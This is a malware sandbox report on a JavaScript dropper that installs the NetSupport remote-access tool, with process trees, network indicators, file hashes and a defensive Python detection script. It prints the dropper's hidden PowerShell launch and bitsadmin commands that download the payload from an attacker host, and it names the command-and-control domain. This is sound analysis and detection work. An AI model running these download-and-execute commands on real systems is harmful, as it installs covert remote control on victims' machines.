Malware Analysis Report

2025-04-13 09:51

Sample ID: 230709-x1s7eagc3y
Target: ave6119jsjsjsjsjsjsjsjsjs.js
SHA256: c4a3d1cec5bac2e0f1eb4671633ee0650b07831004130bd1d76c503655d2d26f
Tags: netsupport, rat
Score: 10/10

Table of Contents

Analysis Overview
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: c4a3d1cec5bac2e0f1eb4671633ee0650b07831004130bd1d76c503655d2d26f
Threat Level: Known bad

The file ave6119jsjsjsjsjsjsjsjsjs.js was found to be: Known bad.

Malicious Activity Summary

Tags: netsupport, rat

NetSupport
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Enumerates physical storage devices
Download via BitsAdmin
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory

What the two detonations show, taken together: wscript.exe runs the .js; a PowerShell script with a name generated at run time (cv3ibkm.ps1 on Windows 7, i5e0n45.ps1 on Windows 10) is written to %TEMP% and launched with -ExecutionPolicy Bypass -WindowStyle hidden -File; on Windows 7 that script spawns six bitsadmin.exe /transfer jobs, all named MeDoW, fetching NetSupport Manager components (AudioCapture.dll, client32.exe, client32.ini, HTCTL32.DLL, msvcr100.dll, nskbfltr.inf) from https://virvatulishop.com/files/ (5.44.245.24) into a location named RoamingOfficeStartup under the user's AppData. On Windows 10 the client file set (client32.exe, PCICL32.dll, pcichek.dll, pcicapi.dll, HTCTL32.DLL, msvcr100.dll, NSM.LIC, client32.ini) lands in C:\Users\Admin\AppData\RoamingOfficeStartup\, client32.exe executes from there, resolves deperekanuki1.com and holds a TCP session to 5.42.74.53:5222, then contacts geo.netsupportsoftware.com over HTTP. The Windows 7 run ended within its 75 s kernel window before any downloaded file or any execution of client32.exe was recorded.

Two points for anyone turning this into detections. NetSupport Manager is a commercial remote-control product, so the component hashes listed under behavioral2 also match licensed installs; what marks this deployment as a RAT is the delivery chain, the install path under the user profile rather than Program Files, and the attacker-supplied client32.ini, the client configuration file that names the gateway the client connects to. geo.netsupportsoftware.com is the vendor's own geolocation endpoint and is contacted by legitimate clients as well; it proves the client started, not who controls it, whereas deperekanuki1.com:5222 is the one connection in this report with no benign explanation.

Analysis: static1

Detonation Overview

Reported: 2023-07-09 19:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-07-09 19:19
Reported: 2023-07-09 19:22
Platform: win7-20230703-en
Max time kernel: 75s
Max time network: 79s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Suspicious use of AdjustPrivilegeToken

  Token: SeDebugPrivilege   Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Suspicious use of WriteProcessMemory

  Each pair below was logged three times. The seven pairs correspond one for one to the seven child processes listed under Processes, so read this table as the parent -> child process tree rather than as evidence of code injection.

  PID 784  (wscript.exe)    -> PID 2336 (powershell.exe)
  PID 2336 (powershell.exe) -> PID 2380 (bitsadmin.exe)
  PID 2336 (powershell.exe) -> PID 2032 (bitsadmin.exe)
  PID 2336 (powershell.exe) -> PID 1760 (bitsadmin.exe)
  PID 2336 (powershell.exe) -> PID 2512 (bitsadmin.exe)
  PID 2336 (powershell.exe) -> PID 2216 (bitsadmin.exe)
  PID 2336 (powershell.exe) -> PID 1752 (bitsadmin.exe)

Processes

Tree reconstructed from the WriteProcessMemory parent/child pairs (wscript.exe PID 784 -> powershell.exe PID 2336 -> six bitsadmin.exe children). The report lists the six bitsadmin command lines in the order below without tying each one to a PID.

C:\Windows\system32\wscript.exe (PID 784)
  wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2336)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1

    C:\Windows\system32\bitsadmin.exe (six instances: PIDs 2380, 2032, 1760, 2512, 2216, 1752)
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll
      "C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf

All six jobs share the display name MeDoW, a usable indicator. The destination strings here read C:\Users\Admin\AppData\RoamingOfficeStartup<file> with no separator before the file name, whereas the Windows 10 run recorded the components under C:\Users\Admin\AppData\RoamingOfficeStartup\.

Network

Country  Destination          Domain             Proto  Connections
US       8.8.8.8:53           virvatulishop.com  udp    1
FI       5.44.245.24:443      virvatulishop.com  tcp    12
US       192.229.211.108:80                      tcp    1

Twelve TLS connections to 5.44.245.24 for six BITS jobs. No connection to any NetSupport gateway or to geo.netsupportsoftware.com was seen in this run, consistent with client32.exe never executing here. The 192.229.211.108:80 row has no domain recorded.

Files

Memory dumps from powershell.exe (PID 2336):
  memory/2336-60-0x000000001B370000-0x000000001B652000-memory.dmp
  memory/2336-61-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
  memory/2336-63-0x0000000002920000-0x00000000029A0000-memory.dmp
  memory/2336-64-0x0000000002920000-0x00000000029A0000-memory.dmp
  memory/2336-65-0x0000000002920000-0x00000000029A0000-memory.dmp
  memory/2336-66-0x0000000002920000-0x00000000029A0000-memory.dmp
  memory/2336-67-0x0000000002920000-0x00000000029A0000-memory.dmp
  memory/2336-68-0x0000000002920000-0x00000000029A0000-memory.dmp
  memory/2336-69-0x0000000002920000-0x00000000029A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1
  MD5     7269a83e127ff320b1f8810b6623ee98
  SHA1    52d53be0e3bf58d1a330f24f7a4f1f6ee543b4a2
  SHA256  9bb8941997354717115d7d57f559b16a5d4be037843cd2403ce16e61add7d404
  SHA512  3bb453737c33a01ea10d365b93685a0d53d7a396d0d1a46466a08388acc49e662fd25300e36695466690cbf9198df9bb50dc1dd0ac6bf92aa7e37ca5152e9877

None of the six files requested through bitsadmin appears in this run's file list: the transfers were started, but the report records no downloaded file on disk within the 75 s kernel window.

Analysis: behavioral2

Detonation Overview

Submitted: 2023-07-09 19:19
Reported: 2023-07-09 19:22
Platform: win10v2004-20230703-en
Max time kernel: 143s
Max time network: 151s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js

Signatures

NetSupport (tags: rat, netsupport)

Checks computer location settings

  Key value queried: \REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation
  Process: C:\Windows\system32\wscript.exe
  Geo\Nation holds the user's configured country code; a script reading it is consistent with a country check, but the report does not show how the value is used.

Executes dropped EXE

  Process: C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (two entries)

Suspicious use of AdjustPrivilegeToken

  Token: SeDebugPrivilege     Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Token: SeSecurityPrivilege  Process: C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

Suspicious use of FindShellTrayWindow

  Process: C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

Processes

C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\i5e0n45.ps1

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
  "C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"

This run records no WriteProcessMemory pairs and no bitsadmin.exe processes, so the parent of client32.exe and the download step are not shown. The dropped PowerShell script carries a different random name than on Windows 7 (i5e0n45.ps1 versus cv3ibkm.ps1), so the name is generated at run time and is not a stable indicator.
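Detection logic for the chain the two runs record (script host -> PowerShell with -ExecutionPolicy Bypass -WindowStyle hidden -File -> bitsadmin /transfer into a user-writable directory -> execution of the dropped client32.exe), written as an added example and not the sandbox's own signature code. It consumes process-creation records of the kind an EDR or Sysmon event 1 feed provides (PID, parent PID, image path, command line). The sample records are constructed from this report's command lines, with PIDs 784, 2336 and 2380 taken from the WriteProcessMemory table of behavioral1; the PID and parent of client32.exe (3100, 2336) are assumed because behavioral2 does not record them. It also accepts the abbreviated switches powershell.exe allows (-ep, -w, -f), which goes beyond the literal command lines on this page, and the "licensed NetSupport lives under Program Files" heuristic is an assumption.

```python
"""Flag the script-host -> PowerShell -> bitsadmin -> dropped-EXE chain from
process-creation records.  Added example for this report, not sandbox code."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
NETSUPPORT_CLIENT = {"client32.exe"}
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")
# Path fragments any user can write to: payloads staged here, not in Program Files/Windows.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\", "\\downloads\\")

@dataclass
class ProcEvent:
    pid: int
    ppid: Optional[int]
    image: str      # full image path
    cmdline: str    # raw command line

def image_name(path: str) -> str:
    """Lower-cased basename of an image path or argv[0]."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()

def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def in_user_writable(path: str) -> bool:
    return any(m in path.lower() for m in USER_WRITABLE)

def ps_switch(tok: str, full: str, shortest: str) -> bool:
    """powershell.exe accepts any prefix of a parameter name at least as long as its
    shortest unambiguous form: -ex, -exec and -ExecutionPolicy are the same switch."""
    if tok[:1] not in ("-", "/"):
        return False
    key = tok[1:].lower()
    return full.startswith(key) and len(key) >= len(shortest)

def analyze_script_host(tokens: List[str]) -> List[str]:
    return [f"script host runs {t} from a user-writable path"
            for t in tokens[1:] if t.lower().endswith(SCRIPT_EXT) and in_user_writable(t)]

def analyze_powershell(tokens: List[str]) -> List[str]:
    found = []
    for i, tok in enumerate(tokens):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if (ps_switch(tok, "executionpolicy", "ex") or tok.lower() in ("-ep", "/ep")) \
                and nxt.lower() in ("bypass", "unrestricted"):
            found.append(f"powershell execution policy {nxt.lower()}")
        if ps_switch(tok, "windowstyle", "w") and nxt.lower() == "hidden":
            found.append("powershell hidden window")
        if ps_switch(tok, "file", "f") and in_user_writable(nxt):
            found.append(f"powershell runs script {nxt} from a user-writable path")
    return found

def analyze_bitsadmin(tokens: List[str]) -> List[str]:
    """A /transfer or /addfile job pulling a remote URL into a user-writable path."""
    if not {t.lower() for t in tokens} & {"/transfer", "/addfile"}:
        return []
    urls = [t for t in tokens if re.match(r"https?://", t, re.I)]
    dests = [t for t in tokens[1:] if re.match(r"[a-z]:\\", t, re.I)]
    dest = dests[-1] if dests else "?"
    where = "user-writable" if in_user_writable(dest) else "system path"
    return [f"bitsadmin download {u} -> {dest} ({where})" for u in urls]

def analyze_image(ev: ProcEvent) -> List[str]:
    name, low, found = image_name(ev.image), ev.image.lower(), []
    if name.endswith(".exe") and in_user_writable(low):
        found.append(f"executable launched from user-writable path {ev.image}")
    # Assumption: a licensed NetSupport Manager install lives under Program Files.
    if name in NETSUPPORT_CLIENT and "\\program files" not in low:
        found.append("NetSupport Manager client32.exe outside Program Files")
    return found

def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image names from the oldest known ancestor down to ev (cycle-safe)."""
    chain, seen, cur = [image_name(ev.image)], {ev.pid}, ev
    while cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(image_name(cur.image))
    return chain[::-1]

def detect(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Return {pid: findings} for every process that tripped a rule."""
    by_pid, report = {e.pid: e for e in events}, {}
    for ev in events:
        name, toks, findings = image_name(ev.image), tokenize(ev.cmdline), []
        if name in SCRIPT_HOSTS:
            findings += analyze_script_host(toks)
        if name in POWERSHELL:
            findings += analyze_powershell(toks)
        if name == "bitsadmin.exe":
            findings += analyze_bitsadmin(toks)
        findings += analyze_image(ev)
        if findings:
            chain = ancestry(ev, by_pid)
            if any(a in SCRIPT_HOSTS for a in chain[:-1]):   # script host somewhere above
                findings.append("ancestry: " + " > ".join(chain))
            report[ev.pid] = findings
    return report

# Constructed sample: command lines and PIDs 784/2336/2380 from this report's behavioral1
# run; the PID and parent of client32.exe (3100, 2336) are assumed, explorer.exe is a control.
SAMPLE_EVENTS = [
    ProcEvent(784, None, r"C:\Windows\system32\wscript.exe",
              r"wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js"),
    ProcEvent(2336, 784, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '
              r"-WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1"),
    ProcEvent(2380, 2336, r"C:\Windows\system32\bitsadmin.exe",
              r'"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal '
              r"https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"),
    ProcEvent(3100, 2336, r"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe",
              r'"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"'),
    ProcEvent(1500, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
]

if __name__ == "__main__":
    for pid, findings in detect(SAMPLE_EVENTS).items():
        print(pid, *findings, sep="\n  ")
```

Run it to print the findings per PID. The ancestry line attached to the bitsadmin.exe and client32.exe entries is the strongest single signal: each element on its own (a BITS job, a hidden PowerShell window, a client32.exe on disk) also occurs in legitimate administration, whereas a script host from %TEMP% sitting above all three does not.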

Network

Country  Destination          Domain                        Proto
US       8.8.8.8:53           9.228.82.20.in-addr.arpa      udp
US       8.8.8.8:53           126.133.255.8.in-addr.arpa    udp
US       8.8.8.8:53           198.209.218.23.in-addr.arpa   udp
US       8.8.8.8:53           95.221.229.192.in-addr.arpa   udp
US       8.8.8.8:53           virvatulishop.com             udp
FI       5.44.245.24:443      virvatulishop.com             tcp
US       8.8.8.8:53           24.245.44.5.in-addr.arpa      udp
US       8.8.8.8:53           deperekanuki1.com             udp
RU       5.42.74.53:5222      deperekanuki1.com             tcp
US       8.8.8.8:53           geo.netsupportsoftware.com    udp
US       8.8.8.8:53           53.74.42.5.in-addr.arpa       udp
US       8.8.8.8:53           103.169.127.40.in-addr.arpa   udp
US       8.8.8.8:53           geo.netsupportsoftware.com    udp
GB       51.142.119.24:80     geo.netsupportsoftware.com    tcp
US       8.8.8.8:53           15.164.165.52.in-addr.arpa    udp
US       8.8.8.8:53           24.119.142.51.in-addr.arpa    udp
US       8.8.8.8:53           240.221.184.93.in-addr.arpa   udp
US       8.8.8.8:53           208.143.182.52.in-addr.arpa   udp

The in-addr.arpa queries are PTR lookups of addresses the guest contacted (24.245.44.5 is 5.44.245.24 reversed, 53.74.42.5 is 5.42.74.53, 24.119.142.51 is 51.142.119.24). The sequence that matters for detection: a single TLS connection to virvatulishop.com, the payload host; then deperekanuki1.com resolving to 5.42.74.53 with a TCP session on port 5222, the only connection not explained by the download or by NetSupport's own telemetry and therefore the candidate gateway; then geo.netsupportsoftware.com over plain HTTP, the vendor's geolocation endpoint, which legitimate NetSupport clients contact as well.

Files

Memory dumps from powershell.exe (PID 2660):
  memory/2660-142-0x0000027A64400000-0x0000027A64422000-memory.dmp
  memory/2660-148-0x0000027A63ED0000-0x0000027A63EE0000-memory.dmp
  memory/2660-149-0x0000027A63ED0000-0x0000027A63EE0000-memory.dmp
  memory/2660-150-0x0000027A7EB40000-0x0000027A7EB54000-memory.dmp
  memory/2660-151-0x0000027A7EB60000-0x0000027A7EB72000-memory.dmp
  memory/2660-152-0x0000027A7EB30000-0x0000027A7EB3A000-memory.dmp
  memory/2660-188-0x0000027A63ED0000-0x0000027A63EE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1mdb2oz.yys.ps1
  MD5     d17fe0a3f47be24a6453e9ef58c94641
  SHA1    6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  (PowerShell writes a __PSScriptPolicyTest_*.ps1 file at start-up to test whether an application-control policy is enforced; it is a by-product of launching powershell.exe, not part of the payload.)

C:\Users\Admin\AppData\Local\Temp\i5e0n45.ps1
  MD5     5147a0d331648239ca26cbec34e9e166
  SHA1    cf1616c225da3983a31378a176356d434f7b89ea
  SHA256  0de826ed5b7c41eec6d359a8b560ba8df6d957da91452f1bb9e47119f0d3de58
  SHA512  067164752f00e9d5fdcbb6c1d7952c9fd8be0586db983c395536973507dea07e49c826683ffe97aa54c9a5b4257ab95002949a2332638cf25108e0cba2290629

Dropped NetSupport Manager components in C:\Users\Admin\AppData\RoamingOfficeStartup\. The report lists several of these more than once, some under both upper- and lower-case names; each is shown once here. This is the standard NetSupport client file set: NSM.LIC is the licence file and client32.ini the client configuration that names the gateway. nskbfltr.inf and AudioCapture.dll, fetched in the Windows 7 run, do not appear here, while PCICL32.dll, pcichek.dll, pcicapi.dll and NSM.LIC were not among the six Windows 7 downloads, so the two runs fetched different file sets.

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe
  MD5     45fe5531717cd1b9532cbb6a5daaeb3a
  SHA1    cb908e267a08c37d7e184f47f788e82cca38f83e
  SHA256  ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
  SHA512  5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll (also listed as PCICL32.DLL)
  MD5     9c9302e75c25c2ba996efd89a1047205
  SHA1    9e79627ff32d5abd3382b65a509baeb31c78a7f2
  SHA256  beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
  SHA512  d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll (also listed as PCICHEK.DLL)
  MD5     104b30fef04433a2d2fd1d5f99f179fe
  SHA1    ecb08e224a2f2772d1e53675bedc4b2c50485a41
  SHA256  956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
  SHA512  5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll
  MD5     34dfb87e4200d852d1fb45dc48f93cfc
  SHA1    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
  SHA256  2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
  SHA512  f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll (also listed as msvcr100.dll)
  MD5     0e37fbfa79d349d672456923ec5fbbe3
  SHA1    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
  SHA256  8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
  SHA512  2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC
  MD5     b9956282a0fed076ed083892e498ac69
  SHA1    d14a665438385203283030a189ff6c5e7c4bf518
  SHA256  fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc
  SHA512  7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini
  MD5     a252f22f61f960c54fa32ae0de7dd17c
  SHA1    00fe1097e70f1f6307e6bc68f40d49abb01dd2d5
  SHA256  a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618
  SHA512  7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL
  MD5     c94005d2dcd2a54e40510344e0bb9435
  SHA1    55b4a1620c5d0113811242c20bd9870a1e31d542
  SHA256  3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
  SHA512  2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a